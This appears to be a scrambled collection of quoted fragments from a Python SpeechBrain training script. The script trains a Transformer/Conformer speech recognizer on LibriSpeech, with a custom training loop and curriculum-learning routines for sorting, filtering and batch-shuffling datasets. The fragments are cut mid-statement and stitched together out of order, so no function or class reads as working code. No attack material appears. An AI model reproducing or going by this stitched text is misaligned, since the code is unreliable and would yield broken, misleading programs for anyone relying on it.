specified if stage == sb.Stage.TRAIN: if hasattr(self.modules, \"env_corrupt\"): wavs_noise = self.modules.env_corrupt(wavs, wav_lens)", "only keep data_point if weight[data_point] > min_weight max_weight : None, int If not", "bool(func(data_point[key])) == True min_weight : None, int If not None, will only keep", "to load checkpoints, and will have the optimizer added to continue training if", "tensorboard summary writer self.tensorboard_writer = SummaryWriter(self.hparams.output_folder + \"/tensorboard\") def compute_forward(self, batch, stage): \"\"\"Forward", "np from functools import cmp_to_key from torch.utils.data import DataLoader from speechbrain.dataio.dataloader import LoopedLoader", "limit in key_min_value.items(): if computed[key] >= limit: continue return False for key, limit", "when training. Default: ``False``. ckpt_interval_minutes (float) Amount of time between saving intra-epoch checkpoints,", "= self.optimizer.__class__.__name__ epoch_stats = { \"epoch\": epoch, \"lr\": lr, \"steps\": steps, \"optimizer\": optimizer,", "dict Kwargs passed to `make_dataloader()` for making the valid_loader (if valid_set is a", "decoder, and an attention mechanism between them. Decoding is performed with (CTC/Att joint)", "if self.checkpointer is not None: self.checkpointer.add_recoverable(\"optimizer\", self.optimizer) self.switched = True def on_fit_start(self): \"\"\"Initialize", "# output layer for ctc log-probabilities logits = self.modules.ctc_lin(enc_out) p_ctc = self.hparams.log_softmax(logits) #", "weights based on pre-defined keys( and/or methods) and their order. - Format :", "must be one of random, sorted, weighted_sorted.\" ) # order batchwise if batch_selection", "optimizer current_epoch = self.hparams.epoch_counter.current current_optimizer = self.optimizer if current_epoch > self.hparams.stage_one_epochs: del self.optimizer", "at the same time. run_on_main(hparams[\"pretrainer\"].collect_files) hparams[\"pretrainer\"].load_collected(device=run_opts[\"device\"]) # Trainer initialization asr_brain = ASR( modules=hparams[\"modules\"],", "training split (e.g, train-clean 100 rather than the full one), and many other", "it is ``-1``. \"\"\" def __init__( self, modules=None, opt_class=None, hparams=None, run_opts=None, checkpointer=None, inter_epoch_dataset_updation=False,", "dim=0 ) tokens = torch.cat([tokens, tokens], dim=0) tokens_lens = torch.cat([tokens_lens, tokens_lens], dim=0) loss_seq", "min_value) or \\ (isinstance(max_value,float) and value > max_value): weights.pop(key,None) return weights filtered_weights =", "main process. Arguments --------- epoch_counter : iterable Each call should return an integer", "(CTC+NLL) given predictions and targets.\"\"\" (p_ctc, p_seq, wav_lens, hyps,) = predictions ids =", "decoder is based on a Transformer decoder. Beamsearch coupled with a Transformer language", "``Brain`` class and override any methods for which the default behavior does not", "train_data = train_data.filtered_sorted(sort_key=\"duration\") # # when sorting do not shuffle in dataloader !", "compute features feats = self.hparams.compute_features(wavs) current_epoch = self.hparams.epoch_counter.current feats = self.modules.normalize(feats, wav_lens, epoch=current_epoch)", "The system employs an encoder, a decoder, and an attention mechanism between them.", "wrong.\" weights = {} for index,data_id in enumerate(shuffled_data_ids): weights[data_id] = index return weights", "wav_lens = batch.sig tokens_bos, _ = batch.tokens_bos # Add augmentation if specified if", "if bool(func(computed[key])): continue return False return True temp_keys = ( set(key_min_value.keys()) | set(key_max_value.keys())", "loss_seq = self.fit_batch(batch) self.avg_train_loss = self.update_average( loss, self.avg_train_loss ) t.set_postfix(train_loss=self.avg_train_loss) # Write training", "-1 if key == \"input_length\": res = self._input_length_comparator(key1,key2) elif key == \"output_length\": res", "system with librispeech. The system employs an encoder, a decoder, and an attention", "encode the labels when creating # mini-batches. tokenizer = hparams[\"tokenizer\"] # 2. Define", "feats = self.hparams.augmentation(feats) # forward modules src = self.modules.CNN(feats) enc_out, pred = self.modules.Transformer(", "\"tokens\" ) def text_pipeline(wrd): yield wrd tokens_list = tokenizer.encode_as_ids(wrd) yield tokens_list tokens_bos =", "\"__main__\": # CLI: hparams_file, run_opts, overrides = sb.parse_arguments(sys.argv[1:]) with open(hparams_file) as fin: hparams", "+ \"/tensorboard\") def compute_forward(self, batch, stage): \"\"\"Forward computations from the waveform batches to", "--------- epoch_counter : iterable Each call should return an integer indicating the epoch", "following methods can be overridden: * ``fit_batch()`` * ``evaluate_batch()`` Arguments --------- modules :", "fini self.check_gradients(loss) self.optimizer.step() self.optimizer.zero_grad() # anneal lr every update self.hparams.noam_annealing(self.optimizer) return loss.detach() ,", "limit, will only keep data_point if data_point[key] <= limit key_test : dict Map", "test_datasets[name].filtered_sorted( sort_key=\"duration\" ) datasets = [train_data, valid_data] + [i for k, i in", "will only keep data_point if data_point[key] <= limit key_test : dict Map from", "stage_stats[\"ACC\"], \"epoch\": epoch}, max_keys=[\"ACC\"], num_to_keep=5, ) elif stage == sb.Stage.TEST: self.hparams.train_logger.log_stats( stats_meta={\"Epoch loaded\":", "of data. In order to use the ``fit()`` method, one should sub-class the", "of str:torch.nn.Module pairs These modules are passed to the optimizer by default if", "self.step += 1 loss = self.evaluate_batch(batch, stage=Stage.VALID) avg_valid_loss = self.update_average( loss, avg_valid_loss )", "_ = self.hparams.test_search(enc_out.detach(), wav_lens) return p_ctc, p_seq, wav_lens, hyps def compute_objectives(self, predictions, batch,", "sort the dataset. ordering_info : str Information to create weights based on pre-defined", "needed for validation/test batches\"\"\" with torch.no_grad(): predictions = self.compute_forward(batch, stage=stage) loss, _, _", "It also defines the data processing pipeline through user-defined functions.\"\"\" data_folder = hparams[\"data_folder\"]", "= False # if hparams[\"sorting\"] == \"ascending\": # # we sort training data", "implementation of the ``fit()`` method, which iterates epochs and datasets for the purpose", "automatic mixed-precision is used. Activate it only with cuda. max_grad_norm (float) Default implementation", "checkpoints from last 5 epochs. The experiment file is flexible enough to support", "this way the filtering and sorting steps don't need to compute the dynamic", "the full LibriSpeech dataset (960 h). The best model is the average of", "8, int Used to divide the dataset into batches. This helps in ordering", "into batches. This helps in ordering the dataset at batch level. select_n :", "By, default, it is False sortagrad: int Number of epochs, for which curriculum", "Map from key (in data or in dynamic items) to func, will only", "gradient clipping & early stop if loss is not fini self.check_gradients(loss) self.optimizer.step() self.optimizer.zero_grad()", "== len(data_ids) , \"OOPS!! Batchwise shuffling gone wrong.\" weights = {} for index,data_id", "= ( set(key_min_value.keys()) | set(key_max_value.keys()) | set(key_test.keys()) ) filtered_data_ids = [] with self.output_keys_as(temp_keys):", "text2: return 1 elif text1 < text2: return -1 else: return 0 class", "<= limit key_test : dict Map from key (in data or in dynamic", "max_keys=[\"ACC\"], num_to_keep=1, ) def recreate_train_dataset(self,epoch): \"\"\"Gets called at the end of a epoch.", "= self.hparams.log_softmax(pred) # Compute outputs hyps = None if stage == sb.Stage.TRAIN: hyps", "= torch.cat([tokens_eos, tokens_eos], dim=0) tokens_eos_lens = torch.cat( [tokens_eos_lens, tokens_eos_lens], dim=0 ) tokens =", "epoch_counter: # Training stage self.on_stage_start(Stage.TRAIN, epoch) self.modules.train() # Reset nonfinite count to 0", "``update_average()`` If the initialization was done with distributed_count > 0 and the distributed_backend", "self.hparams.model.load_state_dict(ckpt, strict=True) self.hparams.model.eval() def dataio_prepare(hparams): \"\"\"This function prepares the datasets to be used", "if weights == None: # Create dataset using ordering info weights = self._custom_sorted_weights(filtered_data_ids,", "filtered data_points. The possible sorting is applied, but only on the first n", "``ddp_gloo``, ``ddp_mpi``, ``data_parallel``. device (str) The location for performing computations. auto_mix_prec (bool) If", "speed up training and get better results. # train_data = train_data.filtered_sorted(sort_key=\"duration\") # #", "all datasets, to ensure code runs without crashing. debug_batches (int) Number of batches", "= len(self.data[key2][\"wrd\"]) if length1 > length2: return 1 elif length1 < length2: return", "descending order Note: This is used only if `weights` is None batch_selection :", "`asc`, `desc` - Example: * \"input_length:asc,output_length:desc\" - Sort the dataset using ``input_length`` in", "batches randomly to create final dataset batch_size : 8, int Used to divide", "-1 optimizer = self.optimizer.__class__.__name__ epoch_stats = { \"epoch\": epoch, \"lr\": lr, \"steps\": steps,", "in the same method is that computing some dynamic items may be expensive,", "weights\"\"\" def weights_filter(weights,min_value,max_value): \"\"\"Checks if the data example has weight within the range", "E.G. batch_size, num_workers. DataLoader kwargs are all valid. valid_loader_kwargs : dict Kwargs passed", "pre-defined keys( and/or methods) and their order. - Format : \"<key1>:<order1>,<key2>:<order2>,........\" - Options", "validation. If a Dataset is given, a DataLoader is automatically created. If a", "kwargs={ \"data_folder\": hparams[\"data_folder\"], \"tr_splits\": hparams[\"train_splits\"], \"dev_splits\": hparams[\"dev_splits\"], \"te_splits\": hparams[\"test_splits\"], \"save_folder\": hparams[\"data_folder\"], \"merge_lst\": hparams[\"train_splits\"],", "if self.switched is True: return if current_epoch > self.hparams.stage_one_epochs: self.optimizer = self.hparams.SGD(self.modules.parameters()) if", "is given, a DataLoader is automatically created. If a DataLoader is given, it", "random weightages for data_ids\"\"\" shuffled_ids = self._random_shuffle_data_ids(data_ids) weights = {} for index,id in", "return weights def _reverse_sort_batches( self, weights=None, batch_size=8 ): \"\"\"Reverse sort the dataset at", "to use for training. If a Dataset is given, a DataLoader is automatically", "batch.sig tokens_bos, _ = batch.tokens_bos # Add augmentation if specified if stage ==", "else: pass else: raise NotImplementedError( \"Ordering Type must be one of random, sorted,", "checkpointer only keeps the averaged checkpoint self.checkpointer.save_and_keep_only( meta={\"ACC\": 1.1, \"epoch\": epoch}, max_keys=[\"ACC\"], num_to_keep=1,", "using random shuffling return else: return def check_and_reset_optimizer(self): \"\"\"reset the optimizer if training", "self.evaluate_batch(batch, stage=Stage.VALID) avg_valid_loss = self.update_average( loss, avg_valid_loss ) # Debug mode only runs", "# order batchwise if batch_selection == \"contiguous\": pass elif batch_selection == \"random\": weights", "methods are used and expected to have a certain behavior: * ``fit_batch()`` *", "data_point = self.data[data_id] data_point[\"id\"] = data_id computed = self.pipeline.compute_outputs(data_point) if combined_filter(computed, key_min_value, key_max_value,", "be one of random, sorted, weighted_sorted.\" ) # order batchwise if batch_selection ==", "if not ( isinstance(train_set, DataLoader) or isinstance(train_set, LoopedLoader) ): train_set = self.make_dataloader( train_set,", "\"<key1>:<order1>,<key2>:<order2>,........\" - Options for keys: `input_length`, `output_length`, `alphabetic` - Options for order: `asc`,", "Returns ------- FilteredSortedDynamicItemDataset Shares the static data, but has its own output keys", "elif key == \"alphabetic\": res = self._alphabetic_comparator(key1,key2) res *= order # If comparison", "tokenizer.encode_as_ids(wrd) yield tokens_list tokens_bos = torch.LongTensor([hparams[\"bos_index\"]] + (tokens_list)) yield tokens_bos tokens_eos = torch.LongTensor(tokens_list", "default, this will be passed all modules in ``modules`` at the beginning of", "tup in sorted(filtered_ids, reverse=reverse) ] return filtered_sorted_ids def _parse_dataset_order( self, dataset_order=\"\" ): \"\"\"Takes", "a neural language model. To run this recipe, do the following: > python", "data_point if weight[data_point] > min_weight max_weight : None, int If not None, will", "computed = self.pipeline.compute_outputs(data_point) if combined_filter(computed, key_min_value, key_max_value, key_test): filtered_data_ids.append(data_id) return filtered_data_ids def _weighted_filtered_sorted_ids(", "= 0 # Validation stage if valid_set is not None: self.on_stage_start(Stage.VALID, epoch) self.modules.eval()", "may be expensive, and this way the filtering and sorting steps don't need", "- Example: * \"random\" - After dataset is ordered based on `ordering_info`, divide", "sys import logging from pathlib import Path import speechbrain as sb from hyperpyyaml", "None, int If not None, will only keep data_point if weight[data_point] < max_weight", "based on output length\"\"\" length1 = len(self.data[key1][\"wrd\"]) length2 = len(self.data[key2][\"wrd\"]) if length1 >", "perform beamsearch with limited capacity # and no LM to give user some", "len(self.data[key1][\"wrd\"]) length2 = len(self.data[key2][\"wrd\"]) if length1 > length2: return 1 elif length1 <", "keep data_point if data_point[key] >= limit key_max_value : dict Map from key (in", "using preferred cl approach return else: # recreate dataset using preferred cl approach", "valid_data = sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=hparams[\"valid_csv\"], replacements={\"data_root\": data_folder}, ) valid_data = valid_data.filtered_sorted(sort_key=\"duration\") # test is", "self.modules.ctc_lin(enc_out) p_ctc = self.hparams.log_softmax(logits) # output layer for seq2seq log-probabilities pred = self.modules.seq_lin(pred)", "the weights if training is interrupted right before stage 2 group = current_optimizer.param_groups[0]", "# do not reload the weights if training is interrupted right before stage", "# keys for ordering info can be , input_length, output_length, alphabetic dataset_ordering =", "that need to be updated, the following methods can be overridden: * ``fit_batch()``", "data_ids, dataset_orderings ): \"\"\"Create `weights` for data points using `ordering_info`\"\"\" def compare(key1,key2): \"\"\"", "Values are `contiguous`, `random`, `sorted`, `reverse-sorted` - Example: * \"random\" - After dataset", "# Create dataset using ordering info weights = self._custom_sorted_weights(filtered_data_ids, dataset_ordering) else: pass else:", "progressbar : bool Whether to display the progress of each epoch in a", "# log stats and save checkpoint at end-of-epoch if stage == sb.Stage.VALID and", "Pairwise Encoding (BPE) are used as basic recognition tokens. Training is performed on", "approach return else: if self.sortagrad != -1: # number of epochs for which", "range (`min_value`, `max_value`)\"\"\" if min_value == None and max_value == None: return weights", ") as t: # cnt = 0 # for batch in t: #", "if ordering_type == \"random\": weights = self._random_shuffled_weights(filtered_data_ids) elif ordering_type == \"sorted\": if weights", "1.1, \"epoch\": epoch}, max_keys=[\"ACC\"], num_to_keep=1, ) def recreate_train_dataset(self,epoch): \"\"\"Gets called at the end", "= batch.id tokens_eos, tokens_eos_lens = batch.tokens_eos tokens, tokens_lens = batch.tokens if hasattr(self.modules, \"env_corrupt\")", "for i, data_id in enumerate(weights.keys()): if select_n is not None and len(filtered_ids) ==", "By default, this will be passed all modules in ``modules`` at the beginning", "do not reload the weights if training is interrupted right before stage 2", "use case (e.g., training a single model with a single dataset) the only", "``data_parallel``. device (str) The location for performing computations. auto_mix_prec (bool) If ``True``, automatic", "losses before stopping. Default: ``3``. noprogressbar (bool) Whether to turn off progressbar when", "items may be expensive, and this way the filtering and sorting steps don't", "run_on_main(hparams[\"pretrainer\"].collect_files) hparams[\"pretrainer\"].load_collected(device=run_opts[\"device\"]) # Trainer initialization asr_brain = ASR( modules=hparams[\"modules\"], opt_class=hparams[\"Adam\"], hparams=hparams, run_opts=run_opts, checkpointer=hparams[\"checkpointer\"],", "average of the checkpoints from last 5 epochs. The experiment file is flexible", "1 elif text1 < text2: return -1 else: return 0 class ASR(sb.core.Brain): r\"\"\"Brain", ": bool Whether dataset must be updated every between epochs or not. It", "idea of how the AM is doing hyps, _ = self.hparams.valid_search(enc_out.detach(), wav_lens) elif", "elif batch_selection == \"random\": weights = self._random_shuffled_batches(weights, batch_size) elif batch_selection == \"sorted\": pass", "sorted using custom weights\"\"\" def weights_filter(weights,min_value,max_value): \"\"\"Checks if the data example has weight", "enumerate(weights.keys()): if select_n is not None and len(filtered_ids) == select_n: break filtered_ids.append((weights[data_id],i,data_id)) filtered_sorted_ids", "self.on_stage_end, args=[Stage.VALID, avg_valid_loss, epoch], ) # Debug mode only runs a few epochs", "static data, but has its own output keys and dynamic items (initially deep", "\"merge_lst\": hparams[\"train_splits\"], \"merge_name\": hparams[\"train_csv\"], \"skip_prep\": hparams[\"skip_prep\"], }, ) # here we create the", "0 or ( stage == sb.Stage.TEST ): # Decode token terms to words", "is True: return if current_epoch > self.hparams.stage_one_epochs: self.optimizer = self.hparams.SGD(self.modules.parameters()) if self.checkpointer is", "in the YAML file). The tokenizer is loaded at the same time. run_on_main(hparams[\"pretrainer\"].collect_files)", "first n data points found. Meant for debugging. Returns ------- FilteredSortedDynamicItemDataset Shares the", "\"sorting must be random, ascending or descending\" # ) valid_data = sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=hparams[\"valid_csv\"],", "weights, min_value=None, max_value=None, select_n=None, reverse=False ): \"\"\"Returns a list of data ids, filtered", "len(data_ids) , \"OOPS!! Batchwise sorting gone wrong.\" weights = {} for index,data_id in", "min_weight : None, int If not None, will only keep data_point if weight[data_point]", "self, data_ids, key_min_value={}, key_max_value={}, key_test={} ): \"\"\"Returns a list of data ids, fulfilling", "# for batch in t: # # print(batch.duration) # # print(batch.wrd) # #", "self.hparams.valid_search_interval if ( current_epoch % valid_search_interval == 0 or stage == sb.Stage.TEST ):", "[] for batch in np.flipud(np.arange(batch_count)): start_index = batch_size * batch end_index = min((batch_size+1)*batch,", "current_epoch = self.hparams.epoch_counter.current feats = self.modules.normalize(feats, wav_lens, epoch=current_epoch) if stage == sb.Stage.TRAIN: if", "weight[data_point] > min_weight max_weight : None, int If not None, will only keep", "if current_epoch > self.hparams.stage_one_epochs: self.optimizer = self.hparams.SGD(self.modules.parameters()) if self.checkpointer is not None: self.checkpointer.add_recoverable(\"optimizer\",", "of three values * ``-1`` - Use curriculum learning for all epochs *", "else: return def check_and_reset_optimizer(self): \"\"\"reset the optimizer if training enters stage 2\"\"\" current_epoch", "column,order = order.split(\":\") ordering_info.append({\"key\":column,\"order\":order}) return ordering_info def _random_shuffle_data_ids( self, data_ids ): \"\"\"Shuffle the", "compute_objectives(self, predictions, batch, stage): \"\"\"Computes the loss (CTC+NLL) given predictions and targets.\"\"\" (p_ctc,", "for debugging. Returns ------- FilteredSortedDynamicItemDataset Shares the static data, but has its own", "tokens], dim=0) tokens_lens = torch.cat([tokens_lens, tokens_lens], dim=0) loss_seq = self.hparams.seq_cost( p_seq, tokens_eos, length=tokens_eos_lens", "_random_shuffled_weights( self, data_ids ): \"\"\"Create random weightages for data_ids\"\"\" shuffled_ids = self._random_shuffle_data_ids(data_ids) weights", "the parameter files, you can try different encoders, decoders, tokens (e.g, characters instead", "some idea of how the AM is doing hyps, _ = self.hparams.valid_search(enc_out.detach(), wav_lens)", "download the pretrained LM from HuggingFace (or elsewhere depending on # # the", "training and get better results. # train_data = train_data.filtered_sorted(sort_key=\"duration\") # # when sorting", "return weights def _input_length_comparator( self, key1, key2 ): \"\"\"Compare two data points based", "= progressbar and sb.utils.distributed.if_main_process() completed_steps = (epoch - 1) * total_steps with tqdm(", "max_key=None, min_key=None): \"\"\"perform checkpoint averge if needed\"\"\" super().on_evaluate_start() ckpts = self.checkpointer.find_checkpoints( max_key=max_key, min_key=min_key", "change the runtime environment, including debug (bool) If ``True``, this will only iterate", "computing some dynamic items may be expensive, and this way the filtering and", "min_weight, max_weight, select_n ) return FilteredSortedDynamicItemDataset( self, filtered_sorted_ids ) def _filter_dataset( self, data_ids,", "# ) valid_data = sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=hparams[\"valid_csv\"], replacements={\"data_root\": data_folder}, ) valid_data = valid_data.filtered_sorted(sort_key=\"duration\") #", "# train_data = train_data.filtered_sorted( # sort_key=\"duration\", reverse=True # ) # # when sorting", "--------- key_min_value : dict Map from key (in data or in dynamic items)", "A set of data to use for training. If a Dataset is given,", "If a DataLoader is given, it is used directly. valid_set : Dataset, DataLoader", "self.avg_train_loss = self.update_average( loss, self.avg_train_loss ) t.set_postfix(train_loss=self.avg_train_loss) # Write training summary to tensorboard", "# We download the pretrained LM from HuggingFace (or elsewhere depending on #", "used in CL which takes feedback from model and reshuffles the dataset. By,", "notation: e.g., self.hparams.model(x). run_opts : dict A set of options to change the", "sb.dataio.dataset.set_output_keys( datasets, [\"id\", \"sig\", \"wrd\", \"tokens_bos\", \"tokens_eos\", \"tokens\",\"duration\"], ) return train_data, valid_data, test_datasets,", "- Use curriculum learning for all epochs * ``n`` - Use curriculum learning", "self.sortagrad = sortagrad # create tensorboard summary writer self.tensorboard_writer = SummaryWriter(self.hparams.output_folder + \"/tensorboard\")", "Time since last intra-epoch checkpoint last_ckpt_time = time.time() # Only show progressbar if", "or isinstance(valid_set, LoopedLoader) ): valid_set = self.make_dataloader( valid_set, stage=sb.Stage.VALID, ckpt_prefix=None, **valid_loader_kwargs, ) self.on_fit_start()", "adding objects to trainer: asr_brain.tokenizer = hparams[\"tokenizer\"] # Training asr_brain.fit( asr_brain.hparams.epoch_counter, train_data, valid_data,", "runs a few batches if self.debug and self.step == self.debug_batches: break # Write", "- After dataset is ordered based on `ordering_info`, divide the dataset into batches", "sb.Stage.TRAIN: tokens_eos = torch.cat([tokens_eos, tokens_eos], dim=0) tokens_eos_lens = torch.cat( [tokens_eos_lens, tokens_eos_lens], dim=0 )", "some dynamic items may be expensive, and this way the filtering and sorting", "dynamic items) to limit, will only keep data_point if data_point[key] >= limit key_max_value", "k, i in test_datasets.items()] # We get the tokenizer as we need it", "= \"sorted\" if len(dataset_ordering) > 0 else \"random\" filtered_data_ids = self._filter_dataset(self.data_ids, key_min_value, key_max_value,", "stage == sb.Stage.TRAIN: self.train_stats = stage_stats self.recreate_train_dataset(epoch=self.hparams.epoch_counter.current) else: stage_stats[\"ACC\"] = self.acc_metric.summarize() current_epoch =", "== None: # Create dataset using ordering info weights = self._custom_sorted_weights(filtered_data_ids, dataset_ordering) else:", "isinstance(train_set, LoopedLoader) ): train_set = self.make_dataloader( train_set, stage=sb.Stage.TRAIN, **train_loader_kwargs ) if valid_set is", "# print(batch.duration) # # print(batch.wrd) # # if cnt == 5: # #", "{} for index,id in enumerate(sorted_data_ids): weights[id] = index return weights def _input_length_comparator( self,", "one of three values * ``-1`` - Use curriculum learning for all epochs", "with open(self.hparams.wer_file, \"w\") as w: self.wer_metric.write_stats(w) # save the averaged checkpoint at the", "the following methods can be overridden: * ``fit_batch()`` * ``evaluate_batch()`` Arguments --------- modules", "max_key=max_key, min_key=min_key ) ckpt = sb.utils.checkpoints.average_checkpoints( ckpts, recoverable_name=\"model\", device=self.device ) self.hparams.model.load_state_dict(ckpt, strict=True) self.hparams.model.eval()", "data_point if data_point[key] >= limit key_max_value : dict Map from key (in data", "\"\"\"Compare two data points based on input length\"\"\" duration1 = float(self.data[key1][\"duration\"]) duration2 =", "| set(key_test.keys()) ) filtered_data_ids = [] with self.output_keys_as(temp_keys): for i, data_id in enumerate(data_ids):", "log-probabilities pred = self.modules.seq_lin(pred) p_seq = self.hparams.log_softmax(pred) # Compute outputs hyps = None", "how the AM is doing hyps, _ = self.hparams.valid_search(enc_out.detach(), wav_lens) elif stage ==", "\"random\": weights = self._random_shuffled_batches(weights, batch_size) elif batch_selection == \"sorted\": pass elif batch_selection ==", "if combined_filter(computed, key_min_value, key_max_value, key_test): filtered_data_ids.append(data_id) return filtered_data_ids def _weighted_filtered_sorted_ids( self, weights, min_value=None,", "input\"\"\" # check if we need to switch optimizer # if so change", "automatically created. If a DataLoader is given, it is used directly. train_loader_kwargs :", "if weight[data_point] > min_weight max_weight : None, int If not None, will only", "weights=None, batch_size=8, reverse=False ): \"\"\"Randomly shuffle the dataset at batch level\"\"\" data_ids =", "abstracts away the details of data loops. The primary purpose of the `Brain`", "test_datasets[k], max_key=\"ACC\", test_loader_kwargs=hparams[\"test_dataloader_opts\"], ) # # print(train_data) # train_set = make_dataloader( # valid_data", "DataLoader is automatically created. If a DataLoader is given, it is used directly.", "sortagrad: int Number of epochs, for which curriculum based dataset be used. It", "each epoch in a progressbar. \"\"\" if not ( isinstance(train_set, DataLoader) or isinstance(train_set,", "are all valid. progressbar : bool Whether to display the progress of each", "loss, global_step) self.tensorboard_writer.add_scalar(\"Train/Loss/ctc_loss\", loss_ctc, global_step) self.tensorboard_writer.add_scalar(\"Train/Loss/att_loss\", loss_seq, global_step) # Debug mode only runs", "else: return res return res shuffled_data_ids = self._random_shuffle_data_ids(data_ids) sorted_data_ids = sorted(shuffled_data_ids,key=cmp_to_key(compare)) weights =", "get better results. # train_data = train_data.filtered_sorted(sort_key=\"duration\") # # when sorting do not", "from speechbrain.core import Stage import time def make_dataloader( dataset, stage, ckpt_prefix=\"dataloader-\", **loader_kwargs, ):", "data_id to weight, these weight(s) will be used to sort the dataset. ordering_info", "= weights_filter(weights,min_value,max_value) filtered_ids = [] for i, data_id in enumerate(weights.keys()): if select_n is", "\"random\" - After dataset is ordered based on `ordering_info`, divide the dataset into", "yield tokens sb.dataio.dataset.add_dynamic_item(datasets, text_pipeline) # 4. Set output: sb.dataio.dataset.set_output_keys( datasets, [\"id\", \"sig\", \"wrd\",", "as well as tokenization and encoding train_data, valid_data, test_datasets, tokenizer = dataio_prepare(hparams) #", "beginning of each epoch\"\"\" if stage != sb.Stage.TRAIN: self.acc_metric = self.hparams.acc_computer() self.wer_metric =", ", \"OOPS!! Batchwise sorting gone wrong.\" weights = {} for index,data_id in enumerate(shuffled_data_ids):", "based dataset be used. It can take one of three values * ``-1``", "wrd tokens_list = tokenizer.encode_as_ids(wrd) yield tokens_list tokens_bos = torch.LongTensor([hparams[\"bos_index\"]] + (tokens_list)) yield tokens_bos", "prepares the datasets to be used in the brain class. It also defines", "> text2: return 1 elif text1 < text2: return -1 else: return 0", "= 0 if self.train_sampler is not None and hasattr( self.train_sampler, \"set_epoch\" ): self.train_sampler.set_epoch(epoch)", "def on_stage_end(self, stage, stage_loss, epoch): \"\"\"Gets called at the end of a epoch.\"\"\"", "ASR( modules=hparams[\"modules\"], opt_class=hparams[\"Adam\"], hparams=hparams, run_opts=run_opts, checkpointer=hparams[\"checkpointer\"], ) # adding objects to trainer: asr_brain.tokenizer", "tokens_bos = torch.LongTensor([hparams[\"bos_index\"]] + (tokens_list)) yield tokens_bos tokens_eos = torch.LongTensor(tokens_list + [hparams[\"eos_index\"]]) yield", "then # create ddp_group with the right communication protocol sb.utils.distributed.ddp_init_group(run_opts) # 1. #", "= math.ceil(data_count / batch_size) shuffled_data_ids = [] for batch in np.random.permutation(np.arange(batch_count)): start_index =", "== \"reverse-sorted\": weights = self._reverse_sort_batches(weights, batch_size) else: raise NotImplementedError( \"Ordering Type must be", "[\"id\", \"sig\", \"wrd\", \"tokens_bos\", \"tokens_eos\", \"tokens\",\"duration\"], ) return train_data, valid_data, test_datasets, tokenizer if", "data_folder = hparams[\"data_folder\"] # train_data = sb.dataio.dataset.DynamicItemDataset.from_csv( # csv_path=hparams[\"train_csv\"], replacements={\"data_root\": data_folder}, # )", "index,data_id in enumerate(shuffled_data_ids): weights[data_id] = index return weights def _reverse_sort_batches( self, weights=None, batch_size=8", "= dataset_order.split(\",\") for order in orderings: if order.strip() == '': continue column,order =", "on specified curriculum, shares static data. The reason to implement these operations in", "return FilteredSortedDynamicItemDataset( self, filtered_sorted_ids ) def _filter_dataset( self, data_ids, key_min_value={}, key_max_value={}, key_test={} ):", "recognition tokens. Training is performed on the full LibriSpeech dataset (960 h). The", "for data points using `ordering_info`\"\"\" def compare(key1,key2): \"\"\" Comparing logic, as `ordering_info` can", "weights = {} for index,id in enumerate(shuffled_ids): weights[id] = index return weights def", "the following: > python train.py hparams/transformer.yaml > python train.py hparams/conformer.yaml With the default", "data_folder}, ) ordering_info = hparams[\"ordering\"] batch_selection = hparams[\"batch_selection\"] batch_size = int(hparams[\"batch_size\"]) train_data =", "initialization asr_brain = ASR( modules=hparams[\"modules\"], opt_class=hparams[\"Adam\"], hparams=hparams, run_opts=run_opts, checkpointer=hparams[\"checkpointer\"], ) # adding objects", "without crashing. debug_batches (int) Number of batches to run in debug mode, Default", "for csv_file in hparams[\"test_csv\"]: name = Path(csv_file).stem test_datasets[name] = sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=csv_file, replacements={\"data_root\": data_folder}", "the runtime environment, including debug (bool) If ``True``, this will only iterate a", "for batch in t: self.step += 1 global_step = completed_steps + self.step loss,", "and sorted using custom weights\"\"\" def weights_filter(weights,min_value,max_value): \"\"\"Checks if the data example has", "from torch.utils.tensorboard import SummaryWriter import sys import logging from pathlib import Path import", "in the brain class. It also defines the data processing pipeline through user-defined", "= sb.parse_arguments(sys.argv[1:]) with open(hparams_file) as fin: hparams = load_hyperpyyaml(fin, overrides) # If distributed_launch=True", "import logging from pathlib import Path import speechbrain as sb from hyperpyyaml import", "enumerate(shuffled_data_ids): weights[data_id] = index return weights def _reverse_sort_batches( self, weights=None, batch_size=8 ): \"\"\"Reverse", "): valid_set = self.make_dataloader( valid_set, stage=sb.Stage.VALID, ckpt_prefix=None, **valid_loader_kwargs, ) self.on_fit_start() self.train_set = train_set", "or in dynamic items) to limit, will only keep data_point if data_point[key] <=", "data_ids[start_index:end_index] assert len(shuffled_data_ids) == len(data_ids) , \"OOPS!! Batchwise sorting gone wrong.\" weights =", "pointless hparams[\"train_dataloader_opts\"][\"shuffle\"] = False # if hparams[\"sorting\"] == \"ascending\": # # we sort", "min_weight=None, max_weight=None, weights=None, ordering_info=\"\", batch_selection=\"contiguous\", batch_size=8, select_n=None, ): \"\"\"Get a filtered and/or sorted", "max_value == None: return weights if isinstance(min_value,int): min_value = float(min_value) if isinstance(max_value,int): max_value", "be overridden: * ``fit_batch()`` * ``evaluate_batch()`` Arguments --------- modules : dict of str:torch.nn.Module", "self.modules.env_corrupt(wavs, wav_lens) wavs = torch.cat([wavs, wavs_noise], dim=0) wav_lens = torch.cat([wav_lens, wav_lens]) tokens_bos =", "not None and hasattr( self.train_sampler, \"set_epoch\" ): self.train_sampler.set_epoch(epoch) # Time since last intra-epoch", "self.debug_epochs: break def on_evaluate_start(self, max_key=None, min_key=None): \"\"\"perform checkpoint averge if needed\"\"\" super().on_evaluate_start() ckpts", "ASR system with librispeech. The system employs an encoder, a decoder, and an", "purpose of \"fitting\" a set of modules to a set of data. In", "= (epoch - 1) * total_steps with tqdm( self.train_set, initial=self.step, dynamic_ncols=True, disable=not enable,", "loss_seq def fit_batch(self, batch): \"\"\"Train the parameters given a single batch in input\"\"\"", "in string as input and creates a dictionary out of it\"\"\" ordering_info =", "that should be jit compiled. distributed_count (int) Number of devices to run on.", "filtered_data_ids.append(data_id) return filtered_data_ids def _weighted_filtered_sorted_ids( self, weights, min_value=None, max_value=None, select_n=None, reverse=False ): \"\"\"Returns", "# train_set, # initial=0, # dynamic_ncols=True, # disable=False, # ) as t: #", "2020 * <NAME> 2021 \"\"\" import os import torch from torch.utils.tensorboard import SummaryWriter", "gone wrong.\" weights = {} for index,data_id in enumerate(shuffled_data_ids): weights[data_id] = index return", "\"\"\" def __init__( self, modules=None, opt_class=None, hparams=None, run_opts=None, checkpointer=None, inter_epoch_dataset_updation=False, sortagrad=-1 ): super().__init__(", "It is used in CL 